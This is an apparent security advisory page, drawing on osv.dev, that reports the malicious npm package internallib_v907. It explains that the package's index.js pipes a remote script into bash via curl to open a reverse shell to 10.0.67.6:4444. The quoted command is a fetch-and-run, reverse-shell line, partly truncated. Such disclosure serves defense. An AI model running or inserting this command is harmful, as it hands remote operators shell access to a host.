internallib_v907 @1.0.3
Vulnerability report · Last retrieved from osv.dev July 16, 2026 at 7:58 PM UTC
OSV ID
MAL-2026-10691
Ecosystem
npm
Summary
index.js line 5 invokes exec('/bin/bash -c "curl https://reverse-shell.sh/... | sh"'), piping a remote script directly into a shell. The fetched payload establishes a reverse shell to the hardcoded endpoint 10.0.67.6:4444, giving a remote operator interactive shell access on the host running the package. The destination is not caller-configurable, no integrity check is performed on the fetched script, and the package name (internallib_v907) does not correspond to any documented functionality that would justify remote shell execution.
Source: amazon-inspector (40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.